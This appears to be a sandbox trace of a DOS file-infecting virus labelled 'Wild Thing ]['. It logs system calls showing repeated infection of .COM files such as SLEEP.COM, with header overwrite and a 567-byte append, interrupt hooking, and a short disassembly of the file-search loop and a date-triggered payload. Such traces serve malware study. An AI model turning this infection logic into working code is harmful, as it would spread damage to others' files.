2018-12-25T12:42:10.625185635Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:10.626850779Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:10.635402614Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:10.647503194Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:10.650413917Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:10.65664898Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:10.668190731Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:10.675586494Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:10.677489001Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:10.685863525Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:10.687659792Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T12:42:10.690699303Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:10.693001896Z 64 PC: 12d36 | Write file or device (See above)
2018-12-25T12:42:10.703512368Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:10.705301043Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:10.713768412Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:10.725554138Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:10.728642612Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:10.735209658Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:10.747206584Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:10.754894564Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:10.756892577Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:10.765360031Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:10.768454973Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T12:42:10.771802975Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:10.774879335Z 64 PC: 12d36 | Write file or device (See above)
2018-12-25T12:42:10.784740658Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:10.786793403Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:10.795833939Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:10.808226091Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:10.811190556Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:10.817908675Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:10.829403054Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:10.837424369Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:10.839014412Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:10.84721628Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:10.849043181Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T12:42:10.852275548Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:10.85553831Z 64 PC: 12d36 | Write file or device (See above)
2018-12-25T12:42:10.865320207Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:10.867405206Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:10.876896289Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:10.888509309Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:10.891822029Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:10.899308054Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:10.911366363Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:10.919170401Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:10.921185048Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:10.931485519Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:10.933294899Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T12:42:10.936487763Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:10.939284265Z 64 PC: 12d36 | Write file or device (See above)
2018-12-25T12:42:10.950630746Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:10.952319037Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:10.961546308Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:10.974414989Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:10.977953456Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:10.984945289Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:10.996745536Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:11.00455201Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:11.007073478Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:11.016288891Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:11.018246999Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T12:42:11.021638718Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:11.024722076Z 64 PC: 12d36 | Write file or device (See above)
2018-12-25T12:42:11.034412002Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:11.036116937Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:11.04524164Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:11.056543444Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:11.059817899Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:11.067260631Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:11.078832348Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:11.092779247Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:11.094391292Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:11.103733039Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:11.105590754Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:11.113881218Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:11.127740835Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:11.130746682Z 59 PC: 12b48 | Change current directory
2018-12-25T12:42:11.135929132Z 59 PC: 12b52 | Change current directory
2018-12-25T12:42:11.138896252Z 26 PC: 12c51 | Set disk transfer address (See above)
2018-12-25T12:42:11.140413237Z 9 PC: 12b6a | Display string (String= 'Wild Thing ][ ')
2018-12-25T12:42:13.347361211Z 72 PC: 8f1b9 | Allocate memory
2018-12-25T12:42:13.350471314Z 72 PC: 8f1bd | Allocate memory
2018-12-25T12:42:13.353729362Z 99 PC: 90858 | Get DBCS lead byte table pointer
2018-12-25T12:42:13.35723816Z 61 PC: 91f88 | Open file (Filename = 'C:\WINDOWS\HIMEM.SYS')
2018-12-25T12:42:13.369041371Z 66 PC: 91f95 | Move file pointer
2018-12-25T12:42:13.371269244Z 62 PC: 91fc1 | Close file
2018-12-25T12:42:13.373939126Z 75 PC: 91fe0 | Execute program
2018-12-25T12:42:13.390864555Z 98 PC: 916f1 | Get current PSP
2018-12-25T12:42:13.392724508Z 9 PC: c605 | Display string (String= '6��r�&;] u')
2018-12-25T12:42:13.39738219Z 48 PC: c609 | Get DOS version
2018-12-25T12:42:13.40092298Z 9 PC: c382 | Display string (String= ' Installed A20 handler number ')
2018-12-25T12:42:13.404759175Z 2 PC: c38c | Character output (Char = '32')
2018-12-25T12:42:13.407251826Z 2 PC: c3a7 | Character output (Char = '2e')
2018-12-25T12:42:13.410914404Z 9 PC: c6d9 | Display string (String= '�����VH�VD���V@��������������_���Ku��t1��������D�����t �� ��������a1��Z�����W���� ������5���|�����(���������Nj�(��������p�^')
2018-12-25T12:42:13.41611608Z 9 PC: c6e0 | Display string (String= '�5���|�����(���������Nj�(��������p�^')
2018-12-25T12:42:13.420698551Z 61 PC: 91f88 | Open file (See above)
2018-12-25T12:42:13.431829532Z 66 PC: 91f95 | Move file pointer (See above)
2018-12-25T12:42:13.436309552Z 62 PC: 91fc1 | Close file (See above)
2018-12-25T12:42:13.438928758Z 75 PC: 91fe0 | Execute program (See above)
2018-12-25T12:42:13.457460806Z 98 PC: 916f1 | Get current PSP (See above)
2018-12-25T12:42:13.4606108Z 82 PC: 13d46 | Get DOS internal pointers (SYSVARS)
2018-12-25T12:42:13.461810484Z 53 PC: 13ac3 | Get interrupt vector (Interrupt = '19' AKA 'Delete file')
2018-12-25T12:42:13.462835788Z 37 PC: 13ad6 | Set interrupt vector (Interrupt = '19' AKA 'Delete file')
2018-12-25T12:42:13.464376223Z 53 PC: 13ae0 | Get interrupt vector (Interrupt = '47' AKA 'Get disk transfer address')
2018-12-25T12:42:13.46538057Z 37 PC: 13af3 | Set interrupt vector (Interrupt = '47' AKA 'Get disk transfer address')
2018-12-25T12:42:13.466401978Z 9 PC: 13a0d | Display string (Could not find end pointer)
2018-12-25T12:42:13.471904122Z 62 PC: 8f8eb | Close file
2018-12-25T12:42:13.473328124Z 62 PC: 8f8f2 | Close file
2018-12-25T12:42:13.474851715Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.476881129Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.483172446Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.484450035Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.486607259Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.487874125Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.489111643Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.492071589Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.493265378Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.49451418Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.496327515Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.497447628Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.498746781Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.500403471Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.501647276Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.502913252Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.504857049Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.506040392Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.507171586Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.509025857Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.510129838Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.511414278Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.513228541Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.514866264Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.51626979Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.518338165Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.51955342Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.52107704Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.523260393Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.525467484Z 61 PC: 8f8ff | Open file (Filename = '')
2018-12-25T12:42:13.530215661Z 62 PC: 8f90e | Close file
2018-12-25T12:42:13.532419199Z 69 PC: 8f915 | Duplicate handle
2018-12-25T12:42:13.534180346Z 69 PC: 8f919 | Duplicate handle
2018-12-25T12:42:13.535475367Z 61 PC: 9387b | Open file (Filename = '')
2018-12-25T12:42:13.539641749Z 68 PC: 9386b | I/O control for devices (Set for = '')
2018-12-25T12:42:13.540942752Z 61 PC: 9387b | Open file (See above)
2018-12-25T12:42:13.544261066Z 68 PC: 9386b | I/O control for devices (See above)
2018-12-25T12:42:13.545889603Z 74 PC: 8f9c4 | Reallocate memory
2018-12-25T12:42:13.547926815Z 72 PC: 8f9e0 | Allocate memory
2018-12-25T12:42:13.55018627Z 72 PC: 8f9e4 | Allocate memory
2018-12-25T12:42:13.55270542Z 74 PC: 8f9fb | Reallocate memory
2018-12-25T12:42:13.554438313Z 72 PC: 8fa02 | Allocate memory
2018-12-25T12:42:13.559558757Z 72 PC: 8fa06 | Allocate memory
2018-12-25T12:42:13.562395329Z 73 PC: 8fa11 | Release memory
2018-12-25T12:42:13.564291645Z 73 PC: 8efea | Release memory
2018-12-25T12:42:13.565496061Z 74 PC: 8f003 | Reallocate memory
2018-12-25T12:42:13.567490168Z 72 PC: 8f054 | Allocate memory
2018-12-25T12:42:13.568940146Z 72 PC: 8f058 | Allocate memory
2018-12-25T12:42:13.570216284Z 73 PC: 8f060 | Release memory
2018-12-25T12:42:13.571533126Z 61 PC: 8f080 | Open file (Filename = '')
2018-12-25T12:42:13.578085862Z 63 PC: 8f095 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T12:42:13.58204918Z 66 PC: 8f0ad | Move file pointer
2018-12-25T12:42:13.583642214Z 62 PC: 8f0d1 | Close file
2018-12-25T12:42:13.585545268Z 75 PC: 8f0f2 | Execute program
2018-12-25T12:42:13.604839824Z 80 PC: 12be9 | Set current PSP
2018-12-25T12:42:13.605859389Z 48 PC: 12bee | Get DOS version
2018-12-25T12:42:13.607850527Z 99 PC: 193d0 | Get DBCS lead byte table pointer
2018-12-25T12:42:13.611646268Z 101 PC: 12c74 | Get extended country info
2018-12-25T12:42:13.613599227Z 99 PC: 12c7a | Get DBCS lead byte table pointer
2018-12-25T12:42:13.615310817Z 74 PC: 12cdc | Reallocate memory
2018-12-25T12:42:13.617484278Z 72 PC: 1355d | Allocate memory
2018-12-25T12:42:13.619779479Z 25 PC: 13596 | Get default drive
2018-12-25T12:42:13.624685671Z 71 PC: 135ad | Get current directory
2018-12-25T12:42:13.627565048Z 59 PC: 135ba | Change current directory
2018-12-25T12:42:13.633292536Z 59 PC: 135c8 | Change current directory
2018-12-25T12:42:13.641286258Z 59 PC: 135d3 | Change current directory
2018-12-25T12:42:13.645259082Z 25 PC: 12d13 | Get default drive
2018-12-25T12:42:13.646872727Z 37 PC: 127d3 | Set interrupt vector (Interrupt = '34' AKA 'Random write')
2018-12-25T12:42:13.649245199Z 37 PC: 127da | Set interrupt vector (Interrupt = '35' AKA 'Get file size in records')
2018-12-25T12:42:13.650619757Z 37 PC: 127e1 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T12:42:13.653322495Z 80 PC: 1301d | Set current PSP
2018-12-25T12:42:13.655475835Z 37 PC: 13041 | Set interrupt vector (Interrupt = '46' AKA 'Set verify flag')
2018-12-25T12:42:13.656884667Z 53 PC: 13362 | Get interrupt vector (Interrupt = '47' AKA 'Get disk transfer address')
2018-12-25T12:42:13.658223317Z 37 PC: 13383 | Set interrupt vector (Interrupt = '47' AKA 'Get disk transfer address')
2018-12-25T12:42:13.660892133Z 51 PC: 13417 | Get or set Ctrl-Break
2018-12-25T12:42:13.663280599Z 72 PC: 130ec | Allocate memory
2018-12-25T12:42:13.665489213Z 61 PC: 131b2 | Open file (Filename = '')
2018-12-25T12:42:13.674882395Z 62 PC: 131ba | Close file
2018-12-25T12:42:13.677456367Z 51 PC: 1344c | Get or set Ctrl-Break
2018-12-25T12:42:13.678859858Z 74 PC: 1197c | Reallocate memory
2018-12-25T12:42:13.681163841Z 72 PC: 11991 | Allocate memory
2018-12-25T12:42:13.683156868Z 73 PC: 119b2 | Release memory
2018-12-25T12:42:13.684776703Z 72 PC: 119bd | Allocate memory
2018-12-25T12:42:13.687140588Z 73 PC: 119df | Release memory
2018-12-25T12:42:13.68827247Z 72 PC: 119f5 | Allocate memory
2018-12-25T12:42:13.690155577Z 72 PC: 119fd | Allocate memory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":14903,"SideJobID":0}

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:42:10.422852831Z 26 PC: 12c51 | Set disk transfer address
2018-12-25T12:42:10.424930305Z 44 PC: 12b0e | Get time
0x12b0e: cmp dh, 0
0x12b11: je 0x12b0a
0x12b13: mov byte ptr cs:[bp + 0x338], dh
0x12b18: mov ah, 0x47
0x12b1a: mov dl, 0
0x12b1c: lea si, word ptr [bp + 0x354]
0x12b20: int 0x21
0x12b22: call 0x12c13
0x12b25: call 0x12c37
0x12b28: mov ah, 0x4e
0x12b2a: lea dx, word ptr [bp + 0x2d4]
0x12b2e: mov cx, 7
0x12b31: int 0x21
0x12b33: jb 0x12b40
0x12b35: lea dx, word ptr [bp + 0x3b2]
0x12b39: call 0x12b75
0x12b3c: mov ah, 0x4f
0x12b3e: jmp 0x12b31
0x12b40: lea dx, word ptr [bp + 0x2ea]
0x12b44: mov ah, 0x3b
2018-12-25T12:42:10.428159754Z 71 PC: 12b22 | Get current directory
2018-12-25T12:42:10.43169302Z 42 PC: 12c17 | Get date
0x12c17: cmp al, 5
0x12c19: je 0x12c1c
0x12c1b: ret
0x12c1c: mov ah, 1
0x12c1e: mov cx, 0x2020
0x12c21: int 0x10
0x12c23: mov ah, 2
0x12c25: xor dx, dx
0x12c27: int 0x10
0x12c29: xor ax, ax
0x12c2b: int 0x10
0x12c2d: mov ah, 9
0x12c2f: lea dx, word ptr [bp + 0x27a]
0x12c33: int 0x21
0x12c35: jmp 0x12c35
0x12c37: mov ah, 0x4e
0x12c39: lea dx, word ptr [bp + 0x2da]
0x12c3d: mov cx, 7
0x12c40: int 0x21
0x12c42: jae 0x12c45
2018-12-25T12:42:10.434472977Z 78 PC: 12c42 | Find first file
2018-12-25T12:42:10.442809999Z 78 PC: 12b33 | Find first file
2018-12-25T12:42:10.44956751Z 67 PC: 12b7b | Get or set file attributes
2018-12-25T12:42:10.456081445Z 67 PC: 12b89 | Get or set file attributes
2018-12-25T12:42:10.477792717Z 61 PC: 12b90 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:42:10.491540415Z 87 PC: 12b98 | Get or set file date and time
2018-12-25T12:42:10.497324958Z 63 PC: 12bad | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:42:10.505465785Z 66 PC: 12c12 | Move file pointer
2018-12-25T12:42:10.507104396Z 64 PC: 12be1 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:42:10.510155307Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:10.514508225Z 64 PC: 12d36 | Write file or device (Write 567 bytes on handle 5)
2018-12-25T12:42:10.523655251Z 87 PC: 12bf8 | Get or set file date and time
2018-12-25T12:42:10.525427033Z 62 PC: 12bfc | Close file
2018-12-25T12:42:10.534861194Z 67 PC: 12c07 | Get or set file attributes
2018-12-25T12:42:10.54912493Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:10.552621996Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:10.559170945Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:10.570696599Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:10.578082143Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:10.579836546Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:10.587661446Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:10.589550602Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T12:42:10.592775266Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:10.595888067Z 64 PC: 12d36 | Write file or device (See above)
2018-12-25T12:42:10.60502527Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:10.606771513Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:10.616796385Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:10.628699207Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:10.632061607Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:10.639474821Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:10.650717381Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:10.658225513Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:10.660566503Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:10.667971461Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:10.669844296Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T12:42:10.673269814Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:10.676310076Z 64 PC: 12d36 | Write file or device (See above)
2018-12-25T12:42:10.685867601Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:10.688111494Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:10.69749901Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:10.708387532Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:10.711419033Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:10.718531056Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:10.729339607Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:10.736725988Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:10.739304721Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:10.746810625Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:10.74880789Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T12:42:10.752955523Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:10.75559318Z 64 PC: 12d36 | Write file or device (See above)
2018-12-25T12:42:10.765508182Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:10.767786233Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:10.777621958Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:10.78938134Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:10.792732339Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:10.800538097Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:10.820783118Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:10.828815244Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:10.831702625Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:10.839273872Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:10.840749329Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T12:42:10.844050219Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:10.845991092Z 64 PC: 12d36 | Write file or device (See above)
2018-12-25T12:42:10.854742746Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:10.866400773Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:10.875297486Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:10.8867869Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:10.88974323Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:10.896619931Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:10.907561433Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:10.915349669Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:10.918247384Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:10.925632096Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:10.927477188Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T12:42:10.931774322Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:10.937292365Z 64 PC: 12d36 | Write file or device (See above)
2018-12-25T12:42:10.943735038Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:10.946101275Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:10.952424569Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:10.959570244Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:10.96235914Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:10.96987083Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:10.988610868Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:10.99697094Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:10.999676174Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:11.00768065Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:11.010093712Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T12:42:11.014678568Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:11.017018589Z 64 PC: 12d36 | Write file or device (See above)
2018-12-25T12:42:11.026980324Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:11.029635016Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:11.038939716Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:11.050310808Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:11.054551632Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:11.061739715Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:11.072961202Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:11.086913487Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:11.089996524Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:11.097525855Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:11.099690483Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:11.109105032Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:11.122120492Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:11.125252984Z 59 PC: 12b48 | Change current directory
2018-12-25T12:42:11.131602328Z 59 PC: 12b52 | Change current directory
2018-12-25T12:42:11.133818522Z 26 PC: 12c51 | Set disk transfer address (See above)
2018-12-25T12:42:11.135267266Z 9 PC: 12b6a | Display string (String= 'Wild Thing ][ ')
2018-12-25T12:42:13.34060811Z 72 PC: 8f1b9 | Allocate memory
2018-12-25T12:42:13.343155182Z 72 PC: 8f1bd | Allocate memory
2018-12-25T12:42:13.345992006Z 99 PC: 90858 | Get DBCS lead byte table pointer
2018-12-25T12:42:13.349870596Z 61 PC: 91f88 | Open file (Filename = 'C:\WINDOWS\HIMEM.SYS')
2018-12-25T12:42:13.363077836Z 66 PC: 91f95 | Move file pointer
2018-12-25T12:42:13.365162906Z 62 PC: 91fc1 | Close file
2018-12-25T12:42:13.367936255Z 75 PC: 91fe0 | Execute program
2018-12-25T12:42:13.387672513Z 98 PC: 916f1 | Get current PSP
2018-12-25T12:42:13.38952516Z 9 PC: c605 | Display string (String= '6��r�&;] u')
2018-12-25T12:42:13.394893033Z 48 PC: c609 | Get DOS version
2018-12-25T12:42:13.39954399Z 9 PC: c382 | Display string (String= ' Installed A20 handler number ')
2018-12-25T12:42:13.40293222Z 2 PC: c38c | Character output (Char = '32')
2018-12-25T12:42:13.405541923Z 2 PC: c3a7 | Character output (Char = '2e')
2018-12-25T12:42:13.414328926Z 9 PC: c6d9 | Display string (String= '�����VH�VD���V@��������������_���Ku��t1��������D�����t �� ��������a1��Z�����W���� ������5���|�����(���������Nj�(��������p�^')
2018-12-25T12:42:13.417485971Z 9 PC: c6e0 | Display string (String= '�5���|�����(���������Nj�(��������p�^')
2018-12-25T12:42:13.421282876Z 61 PC: 91f88 | Open file (See above)
2018-12-25T12:42:13.43170388Z 66 PC: 91f95 | Move file pointer (See above)
2018-12-25T12:42:13.433090514Z 62 PC: 91fc1 | Close file (See above)
2018-12-25T12:42:13.434659094Z 75 PC: 91fe0 | Execute program (See above)
2018-12-25T12:42:13.461402751Z 98 PC: 916f1 | Get current PSP (See above)
2018-12-25T12:42:13.467530135Z 82 PC: 13d46 | Get DOS internal pointers (SYSVARS)
2018-12-25T12:42:13.469086716Z 53 PC: 13ac3 | Get interrupt vector (Interrupt = '19' AKA 'Delete file')
2018-12-25T12:42:13.471842655Z 37 PC: 13ad6 | Set interrupt vector (Interrupt = '19' AKA 'Delete file')
2018-12-25T12:42:13.47465358Z 53 PC: 13ae0 | Get interrupt vector (Interrupt = '47' AKA 'Get disk transfer address')
2018-12-25T12:42:13.47682889Z 37 PC: 13af3 | Set interrupt vector (Interrupt = '47' AKA 'Get disk transfer address')
2018-12-25T12:42:13.47875415Z 9 PC: 13a0d | Display string (Could not find end pointer)
2018-12-25T12:42:13.49323682Z 62 PC: 8f8eb | Close file
2018-12-25T12:42:13.495566947Z 62 PC: 8f8f2 | Close file
2018-12-25T12:42:13.498618738Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.500457168Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.502010848Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.503522484Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.505123461Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.506590783Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.508850545Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.510558885Z 62 PC: 8f8f2 | Close file (See above)
